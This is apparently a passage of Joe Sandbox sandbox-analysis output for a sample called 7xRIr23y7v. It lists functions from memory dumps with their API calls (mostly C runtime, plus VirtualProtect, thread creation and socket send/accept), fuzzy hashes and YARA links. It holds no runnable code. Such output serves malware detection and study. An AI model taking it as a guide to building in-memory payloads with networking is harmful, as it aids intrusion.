malloc.LIBCMT ref: 0000017DEA33A57E
_snprintf.LIBCMT ref: 0000017DEA33A599

Part of subcall function 0000017DEA33AA23: _errno.LIBCMT ref: 0000017DEA33AA5A
Part of subcall function 0000017DEA33AA23: _invalid_parameter_noinfo.LIBCMT ref: 0000017DEA33AA65

malloc.LIBCMT ref: 0000017DEA33A5B4

Memory Dump Source

Source File: 00000000.00000002.2893417364.0000017DEA320000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017DEA320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17dea320000_7xRIr23y7v.jbxd

Yara matches

Similarity

API ID: _errnomalloc$_callnewh$_invalid_parameter_noinfo_snprintf
String ID:
API String ID: 2026495703-0
Opcode ID: 9d156e3cefeacdd739c12abb0c3551306cdb4cd07bab5fe76b50e9a5adbf6d85
Instruction ID: 66aabadb017b6124f89584db9a6d2d2584fe69be529087ba7326416da0805cc3
Opcode Fuzzy Hash: 9d156e3cefeacdd739c12abb0c3551306cdb4cd07bab5fe76b50e9a5adbf6d85
Instruction Fuzzy Hash: 1D115E30A1CF094FE7AAEB6CA4457A576E1FB8C310F10455EE09EC32A6EE349D4587C2

Uniqueness

Uniqueness Score: -1.00%

Function 0000017DEA33BA13 Relevance: 6.2, APIs: 4, Instructions: 194COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 0000017DEA33BA4B

Part of subcall function 0000017DEA33CE57: _getptd_noexit.LIBCMT ref: 0000017DEA33CE5B

_invalid_parameter_noinfo.LIBCMT ref: 0000017DEA33BA56
_flush.LIBCMT ref: 0000017DEA33BB08
_fileno.LIBCMT ref: 0000017DEA33BB29

Memory Dump Source

Source File: 00000000.00000002.2893417364.0000017DEA320000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017DEA320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17dea320000_7xRIr23y7v.jbxd

Yara matches

Similarity

API ID: _errno_fileno_flush_getptd_noexit_invalid_parameter_noinfo
String ID:
API String ID: 634798775-0
Opcode ID: d9a7cbc57c08e93ea4e26a3c7604e2752fe338a7cd3052b495f505ff3fc04027
Instruction ID: 67b402546a241fd06ced06e54f2f2475c2ea814b717879591494beb6737e586a
Opcode Fuzzy Hash: d9a7cbc57c08e93ea4e26a3c7604e2752fe338a7cd3052b495f505ff3fc04027
Instruction Fuzzy Hash: 3051C53021CF0E4BE66B5EAD64463B572F1EF94311F14022E94AEC71E6ED60D95A4287

Uniqueness

Uniqueness Score: -1.00%

Function 0000017DEA320517 Relevance: 6.1, APIs: 4, Instructions: 90COMMONLIBRARYCODE

Download Yara Rule

APIs

clock.LIBCMT ref: 0000017DEA32055E
clock.LIBCMT ref: 0000017DEA32056B
clock.LIBCMT ref: 0000017DEA320574
clock.LIBCMT ref: 0000017DEA320581

Memory Dump Source

Source File: 00000000.00000002.2893417364.0000017DEA320000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017DEA320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17dea320000_7xRIr23y7v.jbxd

Yara matches

Similarity

API ID: clock
String ID:
API String ID: 3195780754-0
Opcode ID: c0a40aaec8f37a8735c214560a9d147e859d58f7e4e64c7536be45b4d64e88a7
Instruction ID: 550da7b6638f5a8c0b879799d48fd411745b0a90e91adca122310549b48de785
Opcode Fuzzy Hash: c0a40aaec8f37a8735c214560a9d147e859d58f7e4e64c7536be45b4d64e88a7
Instruction Fuzzy Hash: DB21967280C71E4EE769A9D874423B6BAF0EFD6350F26062DD8CE87153ED509D4642E3

Uniqueness

Uniqueness Score: -1.00%

Function 0000017DEA34A91F Relevance: 6.1, APIs: 4, Instructions: 84stringCOMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0000017DEA34A943

Part of subcall function 0000017DEA33D667: _getptd.LIBCMT ref: 0000017DEA33D67D
Part of subcall function 0000017DEA33D667: __updatetlocinfo.LIBCMT ref: 0000017DEA33D6B2
Part of subcall function 0000017DEA33D667: __updatetmbcinfo.LIBCMT ref: 0000017DEA33D6D9

_errno.LIBCMT ref: 0000017DEA34A94F

Part of subcall function 0000017DEA33CE57: _getptd_noexit.LIBCMT ref: 0000017DEA33CE5B

_invalid_parameter_noinfo.LIBCMT ref: 0000017DEA34A95A
strchr.LIBCMT ref: 0000017DEA34A970

Memory Dump Source

Source File: 00000000.00000002.2893417364.0000017DEA320000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017DEA320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17dea320000_7xRIr23y7v.jbxd

Yara matches

Similarity

API ID: Locale$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_errno_getptd_getptd_noexit_invalid_parameter_noinfostrchr
String ID:
API String ID: 4151157258-0
Opcode ID: e73a64bc40bbff2a8f0215fd328a69f3920fe490f54b7fbe8d2d413a192876cd
Instruction ID: 021639943229e77db39252cc1cb36e80104523aff318ba4f5f605cc3ce9ec98e
Opcode Fuzzy Hash: e73a64bc40bbff2a8f0215fd328a69f3920fe490f54b7fbe8d2d413a192876cd
Instruction Fuzzy Hash: 3221373091C67F4EE7A29AA8A0843B936F0FFC4351F060669E0EECF1D5DD248A418253

Uniqueness

Uniqueness Score: -1.00%

Function 0000017DEA33B4D3 Relevance: 6.1, APIs: 4, Instructions: 64COMMONLIBRARYCODE

Download Yara Rule

APIs

_IsNonwritableInCurrentImage.LIBCMT ref: 0000017DEA33B4F0

Part of subcall function 0000017DEA33F727: _FindPESection.LIBCMT ref: 0000017DEA33F750

_initp_misc_cfltcvt_tab.LIBCMT ref: 0000017DEA33B501
_initterm_e.LIBCMT ref: 0000017DEA33B514
_IsNonwritableInCurrentImage.LIBCMT ref: 0000017DEA33B55D

Memory Dump Source

Source File: 00000000.00000002.2893417364.0000017DEA320000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017DEA320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17dea320000_7xRIr23y7v.jbxd

Yara matches

Similarity

API ID: CurrentImageNonwritable$FindSection_initp_misc_cfltcvt_tab_initterm_e
String ID:
API String ID: 1991439119-0
Opcode ID: 2552c9ef44d90416ddedbaa5506d907db74c59832b5c0af08c42db9a1dc968fc
Instruction ID: 77f26ae25e4034da20d9ab69b5df10cf3362a498eb192f3adde27fa2d57569e5
Opcode Fuzzy Hash: 2552c9ef44d90416ddedbaa5506d907db74c59832b5c0af08c42db9a1dc968fc
Instruction Fuzzy Hash: 6B11603021DA0E8BF757BFA1FC957F632B5FB94340F440525A41ACA0B1EE788A88C642

Uniqueness

Uniqueness Score: -1.00%

Function 0000017DEA74B4D8 Relevance: 6.1, APIs: 4, Instructions: 62stringCOMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0000017DEA74B4FC

Part of subcall function 0000017DEA73E220: _getptd.LIBCMT ref: 0000017DEA73E236
Part of subcall function 0000017DEA73E220: __updatetlocinfo.LIBCMT ref: 0000017DEA73E26B
Part of subcall function 0000017DEA73E220: __updatetmbcinfo.LIBCMT ref: 0000017DEA73E292

_errno.LIBCMT ref: 0000017DEA74B508

Part of subcall function 0000017DEA73DA10: _getptd_noexit.LIBCMT ref: 0000017DEA73DA14

_invalid_parameter_noinfo.LIBCMT ref: 0000017DEA74B513
strchr.LIBCMT ref: 0000017DEA74B529

Memory Dump Source

Source File: 00000000.00000002.2893583367.0000017DEA720000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017DEA720000, based on PE: true

Associated: 00000000.00000002.2893583367.0000017DEA761000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA764000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA767000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17dea720000_7xRIr23y7v.jbxd

Yara matches

Similarity

API ID: Locale$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_errno_getptd_getptd_noexit_invalid_parameter_noinfostrchr
String ID:
API String ID: 4151157258-0
Opcode ID: e73a64bc40bbff2a8f0215fd328a69f3920fe490f54b7fbe8d2d413a192876cd
Instruction ID: 06371dc539a795cbd10966e39d87f7950f7609ab332eb71ce1e2f117aa8bd710
Opcode Fuzzy Hash: e73a64bc40bbff2a8f0215fd328a69f3920fe490f54b7fbe8d2d413a192876cd
Instruction Fuzzy Hash: 2821A47260C2AB41EA63E615B0503BDEEF0EBC4BD4F585131A6DE8EAD5CD28CE418612

Uniqueness

Uniqueness Score: -1.00%

Function 0000017DEA7210D0 Relevance: 6.1, APIs: 4, Instructions: 62COMMONLIBRARYCODE

Download Yara Rule

APIs

clock.LIBCMT ref: 0000017DEA721117
clock.LIBCMT ref: 0000017DEA721124
clock.LIBCMT ref: 0000017DEA72112D
clock.LIBCMT ref: 0000017DEA72113A

Memory Dump Source

Source File: 00000000.00000002.2893583367.0000017DEA720000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017DEA720000, based on PE: true

Associated: 00000000.00000002.2893583367.0000017DEA761000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA764000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA767000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17dea720000_7xRIr23y7v.jbxd

Yara matches

Similarity

API ID: clock
String ID:
API String ID: 3195780754-0
Opcode ID: c0a40aaec8f37a8735c214560a9d147e859d58f7e4e64c7536be45b4d64e88a7
Instruction ID: ee6a93cccda88fbda8eeb58fb4a2e920a8539f4c6dbb5bff573649befd493e1b
Opcode Fuzzy Hash: c0a40aaec8f37a8735c214560a9d147e859d58f7e4e64c7536be45b4d64e88a7
Instruction Fuzzy Hash: 2711017210865B45E3B3FE6274402BAB6B0BFC4390F191031EEDC0B285ED74CA818622

Uniqueness

Uniqueness Score: -1.00%

Function 0000017DEA73A324 Relevance: 6.0, APIs: 4, Instructions: 41threadsleepCOMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0000017DEA72D0D8: VirtualProtect.KERNEL32 ref: 0000017DEA72D168

Part of subcall function 0000017DEA73ACF8: free.LIBCMT ref: 0000017DEA73AD94
Part of subcall function 0000017DEA73ACF8: free.LIBCMT ref: 0000017DEA73ADA5

Sleep.KERNEL32 ref: 0000017DEA73A367
ExitThread.KERNEL32 ref: 0000017DEA73A371
CreateThread.KERNEL32 ref: 0000017DEA73A396
ExitProcess.KERNEL32 ref: 0000017DEA73A3B5

Memory Dump Source

Source File: 00000000.00000002.2893583367.0000017DEA720000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017DEA720000, based on PE: true

Associated: 00000000.00000002.2893583367.0000017DEA761000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA764000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA767000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17dea720000_7xRIr23y7v.jbxd

Yara matches

Similarity

API ID: ExitThreadfree$CreateProcessProtectSleepVirtual
String ID:
API String ID: 334832864-0
Opcode ID: b0c9434338f191774dad3a3bc8873c414334a7dcf96e742dbcc85d9feb61dd03
Instruction ID: 106567a0914545672c2162bb66036591e26a50b3511f24ee52d5706b3dcc5c57
Opcode Fuzzy Hash: b0c9434338f191774dad3a3bc8873c414334a7dcf96e742dbcc85d9feb61dd03
Instruction Fuzzy Hash: 7801923160CA4B82FB6BFB20B4523FD2275AFC07A4F114639D5CE0D5E5CE3D86444206

Uniqueness

Uniqueness Score: -1.00%

Function 0000017DEA73B054 Relevance: 6.0, APIs: 4, Instructions: 39networkCOMMON

Download Yara Rule

APIs

accept.WS2_32 ref: 0000017DEA73B069
send.WS2_32 ref: 0000017DEA73B0A7
send.WS2_32 ref: 0000017DEA73B0BB
closesocket.WS2_32 ref: 0000017DEA73B0CC

Part of subcall function 0000017DEA73B190: closesocket.WS2_32 ref: 0000017DEA73B19C
Part of subcall function 0000017DEA73B190: free.LIBCMT ref: 0000017DEA73B1A6
Part of subcall function 0000017DEA73B190: free.LIBCMT ref: 0000017DEA73B1AF
Part of subcall function 0000017DEA73B190: free.LIBCMT ref: 0000017DEA73B1B8

Memory Dump Source

Source File: 00000000.00000002.2893583367.0000017DEA720000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017DEA720000, based on PE: true

Associated: 00000000.00000002.2893583367.0000017DEA761000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA764000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA767000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17dea720000_7xRIr23y7v.jbxd

Yara matches

Similarity

API ID: free$closesocketsend$accept
String ID:
API String ID: 47150829-0
Opcode ID: 2302a165cdef7cc09ef642e4ce3548a0388fbd4d973569beb06914d3a6b68fc5
Instruction ID: c404660a4506a8ccc9a7d44106b8d67e0172798b662395ee4d9c2d3607794453
Opcode Fuzzy Hash: 2302a165cdef7cc09ef642e4ce3548a0388fbd4d973569beb06914d3a6b68fc5
Instruction Fuzzy Hash: 6701CC3130854A81EB12EB26F9417B92732FBC9FE4F108130CEAA0BB84CE28C2048742

Uniqueness

Uniqueness Score: -1.00%

Function 0000017DEA733B18 Relevance: 6.0, APIs: 4, Instructions: 34sleeppipeCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 0000017DEA733B2C
PeekNamedPipe.KERNEL32 ref: 0000017DEA733B51
Sleep.KERNEL32 ref: 0000017DEA733B67
GetTickCount.KERNEL32 ref: 0000017DEA733B6D

Memory Dump Source

Source File: 00000000.00000002.2893583367.0000017DEA720000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017DEA720000, based on PE: true

Associated: 00000000.00000002.2893583367.0000017DEA761000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA764000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA767000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17dea720000_7xRIr23y7v.jbxd

Yara matches

Similarity

API ID: CountTick$NamedPeekPipeSleep
String ID:
API String ID: 1593283408-0
Opcode ID: 24ed3f8e0f689e66d14563056fce9734228b0b7ac3161939a24db8e0b7bcfd6a
Instruction ID: 196b8d664c6656487669b07a331750479d498f0091ee32b93eafa84a6e759999
Opcode Fuzzy Hash: 24ed3f8e0f689e66d14563056fce9734228b0b7ac3161939a24db8e0b7bcfd6a
Instruction Fuzzy Hash: 9C01D63121CA5682F722E725F8443AAB3B4EFC4BE0F350034DBCD4AA64DE38C5858705

Uniqueness

Uniqueness Score: -1.00%

Function 0000017DEA7331D0 Relevance: 6.0, APIs: 4, Instructions: 32sleeppipeCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 0000017DEA7331E9
PeekNamedPipe.KERNEL32 ref: 0000017DEA73320E
Sleep.KERNEL32 ref: 0000017DEA733224
GetTickCount.KERNEL32 ref: 0000017DEA73322A

Memory Dump Source

Source File: 00000000.00000002.2893583367.0000017DEA720000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017DEA720000, based on PE: true

Associated: 00000000.00000002.2893583367.0000017DEA761000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA764000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA767000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17dea720000_7xRIr23y7v.jbxd

Yara matches

Similarity

API ID: CountTick$NamedPeekPipeSleep
String ID:
API String ID: 1593283408-0
Opcode ID: 2a447a1a196fe585755e7802e0ac48e0573567d8f0a00b20491c8c660c2fcfe5
Instruction ID: 8eefe9cf70630588cb19365ace09f4a4241bea11647a152a224c04be9e9a6092
Opcode Fuzzy Hash: 2a447a1a196fe585755e7802e0ac48e0573567d8f0a00b20491c8c660c2fcfe5
Instruction Fuzzy Hash: 7301A232618A5682F721DB14F4447AAB374EBC4BE4F254130DBC946A64DE3DC5848B09

Uniqueness

Uniqueness Score: -1.00%

Function 0000017DEA73B190 Relevance: 6.0, APIs: 4, Instructions: 15COMMON

Download Yara Rule

APIs

closesocket.WS2_32 ref: 0000017DEA73B19C
free.LIBCMT ref: 0000017DEA73B1A6

Part of subcall function 0000017DEA73B1E8: HeapFree.KERNEL32 ref: 0000017DEA73B1FE
Part of subcall function 0000017DEA73B1E8: _errno.LIBCMT ref: 0000017DEA73B208
Part of subcall function 0000017DEA73B1E8: GetLastError.KERNEL32 ref: 0000017DEA73B210

free.LIBCMT ref: 0000017DEA73B1AF
free.LIBCMT ref: 0000017DEA73B1B8

Memory Dump Source

Source File: 00000000.00000002.2893583367.0000017DEA720000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017DEA720000, based on PE: true

Associated: 00000000.00000002.2893583367.0000017DEA761000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA764000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA767000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17dea720000_7xRIr23y7v.jbxd

Yara matches

Similarity

API ID: free$ErrorFreeHeapLast_errnoclosesocket
String ID:
API String ID: 1525665891-0
Opcode ID: 313ab394c69fba967237909609d084426ad4e213068f2606add6450c422dc6b8
Instruction ID: 2b4a4b7a09d767c60ec744573a5dd020cc4002bdf8b49b92f8ca1450717580fa
Opcode Fuzzy Hash: 313ab394c69fba967237909609d084426ad4e213068f2606add6450c422dc6b8
Instruction Fuzzy Hash: D2E04C3161840A82EA16FBA2E8511BC1630ABD9F94F6504319F9E5E296DD54C6598381

Uniqueness

Uniqueness Score: -1.00%

Function 0000017DEA33922B Relevance: 5.4, APIs: 4, Instructions: 378COMMONLIBRARYCODE

Download Yara Rule

APIs

malloc.LIBCMT ref: 0000017DEA33929E
malloc.LIBCMT ref: 0000017DEA3394C2
malloc.LIBCMT ref: 0000017DEA3395C0

Part of subcall function 0000017DEA33C8FB: _getptd.LIBCMT ref: 0000017DEA33C91A

free.LIBCMT ref: 0000017DEA3395A8

Part of subcall function 0000017DEA33A62F: _errno.LIBCMT ref: 0000017DEA33A64F

Memory Dump Source

Source File: 00000000.00000002.2893417364.0000017DEA320000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017DEA320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17dea320000_7xRIr23y7v.jbxd

Yara matches

Similarity

API ID: malloc$_errno_getptdfree
String ID:
API String ID: 3172138858-0
Opcode ID: 33df26be159aca12d7d0b71fc111742376d265778d5d8216e679c52589a3f316
Instruction ID: 6a4045de97f0535bb5a174755c184c17c8038eb5142271f3db027953818716a3
Opcode Fuzzy Hash: 33df26be159aca12d7d0b71fc111742376d265778d5d8216e679c52589a3f316
Instruction Fuzzy Hash: D9C1B57051CA098FF76AEB68B8517B837F1FB85310F60412AD45AC72B1DE7899478782

Uniqueness

Uniqueness Score: -1.00%

Function 0000017DEA33AC47 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 69COMMON

Download Yara Rule

APIs

_errno.LIBCMT ref: 0000017DEA33AC98

Part of subcall function 0000017DEA33CE57: _getptd_noexit.LIBCMT ref: 0000017DEA33CE5B

_invalid_parameter_noinfo.LIBCMT ref: 0000017DEA33ACA3

Strings

B, xrefs: 0000017DEA33ACCF

Memory Dump Source

Source File: 00000000.00000002.2893417364.0000017DEA320000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017DEA320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17dea320000_7xRIr23y7v.jbxd

Yara matches

Similarity

API ID: _errno_getptd_noexit_invalid_parameter_noinfo
String ID: B
API String ID: 1812809483-1255198513
Opcode ID: d81cd18daed7324077352a26b73286590cea42c1c2305b4db55e814308682461
Instruction ID: 7e2a9500f6078f3028710fa99721eca825e6dc660d2de8efba107212f17aa098
Opcode Fuzzy Hash: d81cd18daed7324077352a26b73286590cea42c1c2305b4db55e814308682461
Instruction Fuzzy Hash: 6611903061CA0D4FD755EF5894457A5B6E1FB98325F10476EA02DC72A1CE34C944C782

Uniqueness

Uniqueness Score: -1.00%

Function 0000017DEA737730 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMONLIBRARYCODE

Download Yara Rule

APIs

OpenProcessToken.ADVAPI32 ref: 0000017DEA73774A

Part of subcall function 0000017DEA73AA24: GetTokenInformation.ADVAPI32 ref: 0000017DEA73AAB9

CloseHandle.KERNEL32 ref: 0000017DEA73776B

Strings

x86, xrefs: 0000017DEA737735

Memory Dump Source

Source File: 00000000.00000002.2893583367.0000017DEA720000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017DEA720000, based on PE: true

Associated: 00000000.00000002.2893583367.0000017DEA761000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA764000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA767000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17dea720000_7xRIr23y7v.jbxd

Yara matches

Similarity

API ID: Token$CloseHandleInformationOpenProcess
String ID: x86
API String ID: 4232945836-2105985432
Opcode ID: 5a41a51bf698734cf9521a0727e2a643bce50156592c75ad6408320f95609740
Instruction ID: 8dddc2568a35469a128972b7a73fd81e5c7430c12ffa80e039c0ee2445c7b9a5
Opcode Fuzzy Hash: 5a41a51bf698734cf9521a0727e2a643bce50156592c75ad6408320f95609740
Instruction Fuzzy Hash: EAE09B2131868582D711DB56F5842BA9770FBCCBD0F645031EF8C4BB19CE2CC5848B01

Uniqueness

Uniqueness Score: -1.00%

Function 0000017DEA721CC4 Relevance: 5.3, APIs: 4, Instructions: 261COMMONLIBRARYCODE

Download Yara Rule

APIs

calloc.LIBCMT ref: 0000017DEA721D6A

Part of subcall function 0000017DEA74AD08: _calloc_impl.LIBCMT ref: 0000017DEA74AD18
Part of subcall function 0000017DEA74AD08: _errno.LIBCMT ref: 0000017DEA74AD2B
Part of subcall function 0000017DEA74AD08: _errno.LIBCMT ref: 0000017DEA74AD35

free.LIBCMT ref: 0000017DEA721EF3
free.LIBCMT ref: 0000017DEA721EFD
free.LIBCMT ref: 0000017DEA721F0F

Memory Dump Source

Source File: 00000000.00000002.2893583367.0000017DEA720000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017DEA720000, based on PE: true

Associated: 00000000.00000002.2893583367.0000017DEA761000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA764000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA767000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17dea720000_7xRIr23y7v.jbxd

Yara matches

Similarity

API ID: free$_errno$_calloc_implcalloc
String ID:
API String ID: 4000150058-0
Opcode ID: 7b8745674e28e7b70cb4deb2e970bc6e60b78951763222cc85c2c654bb8a124c
Instruction ID: 8d7d47315191cab4ce5eda3b673a317dcd6218fdca19ca99537ae8c88c963884
Opcode Fuzzy Hash: 7b8745674e28e7b70cb4deb2e970bc6e60b78951763222cc85c2c654bb8a124c
Instruction Fuzzy Hash: C6C12772608B858AE765DF65F88039E77B4FB88B88F10412AEB8D47B58DF38C555CB01

Uniqueness

Uniqueness Score: -1.00%

Function 0000017DEA32DD1B Relevance: 5.2, APIs: 4, Instructions: 200COMMONLIBRARYCODE

Download Yara Rule

APIs

_snprintf.LIBCMT ref: 0000017DEA32DDB8

Part of subcall function 0000017DEA33AA23: _errno.LIBCMT ref: 0000017DEA33AA5A
Part of subcall function 0000017DEA33AA23: _invalid_parameter_noinfo.LIBCMT ref: 0000017DEA33AA65

_snprintf.LIBCMT ref: 0000017DEA32DDD4
_snprintf.LIBCMT ref: 0000017DEA32DE4A
_snprintf.LIBCMT ref: 0000017DEA32DE61

Memory Dump Source

Source File: 00000000.00000002.2893417364.0000017DEA320000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017DEA320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17dea320000_7xRIr23y7v.jbxd

Yara matches

Similarity

API ID: _snprintf$_errno_invalid_parameter_noinfo
String ID:
API String ID: 3442832105-0
Opcode ID: 0694fbe2251f325486d7db104ce5f9bbd3e0ba48dceb4aa3373eff9f8ea386f1
Instruction ID: 632bdde3a64a041c71242036163611edcccb9d5f736f2e933d97cc665f96a2a8
Opcode Fuzzy Hash: 0694fbe2251f325486d7db104ce5f9bbd3e0ba48dceb4aa3373eff9f8ea386f1
Instruction Fuzzy Hash: CA61613151CA4E8FEB46EB58E885BE977F5FF94301F00412AE44AC72A1DE34DA458B82

Uniqueness

Uniqueness Score: -1.00%

Function 0000017DEA323747 Relevance: 5.2, APIs: 4, Instructions: 179COMMONLIBRARYCODE

Download Yara Rule

APIs

malloc.LIBCMT ref: 0000017DEA3237AA

Memory Dump Source

Source File: 00000000.00000002.2893417364.0000017DEA320000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017DEA320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17dea320000_7xRIr23y7v.jbxd

Yara matches

Similarity

API ID: malloc
String ID:
API String ID: 2803490479-0
Opcode ID: af4f2ed209ae52dfb52021ff345b07ebb56da9540d6e1632b77b8fead6dfbfea
Instruction ID: c13701021f70760a2220955047fb1559bdf5da7ceb1f1934d188ddffa4e019e3
Opcode Fuzzy Hash: af4f2ed209ae52dfb52021ff345b07ebb56da9540d6e1632b77b8fead6dfbfea
Instruction Fuzzy Hash: 5551B43061CA0A4BEB5A9F6CA4856B9B3F5FFC4310F10555DD85FCB296EE20ED0A4682

Uniqueness

Uniqueness Score: -1.00%

Function 0000017DEA7392AC Relevance: 5.2, APIs: 4, Instructions: 155COMMONLIBRARYCODE

Download Yara Rule

APIs

malloc.LIBCMT ref: 0000017DEA7392E0

Part of subcall function 0000017DEA73B228: _FF_MSGBANNER.LIBCMT ref: 0000017DEA73B258
Part of subcall function 0000017DEA73B228: _NMSG_WRITE.LIBCMT ref: 0000017DEA73B262
Part of subcall function 0000017DEA73B228: HeapAlloc.KERNEL32 ref: 0000017DEA73B27D
Part of subcall function 0000017DEA73B228: _callnewh.LIBCMT ref: 0000017DEA73B296
Part of subcall function 0000017DEA73B228: _errno.LIBCMT ref: 0000017DEA73B2A1
Part of subcall function 0000017DEA73B228: _errno.LIBCMT ref: 0000017DEA73B2AC

free.LIBCMT ref: 0000017DEA739427
free.LIBCMT ref: 0000017DEA73948B
free.LIBCMT ref: 0000017DEA739497

Memory Dump Source

Source File: 00000000.00000002.2893583367.0000017DEA720000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017DEA720000, based on PE: true

Associated: 00000000.00000002.2893583367.0000017DEA761000.00000040.00001000.00020000.00000000.sdmpDownload File
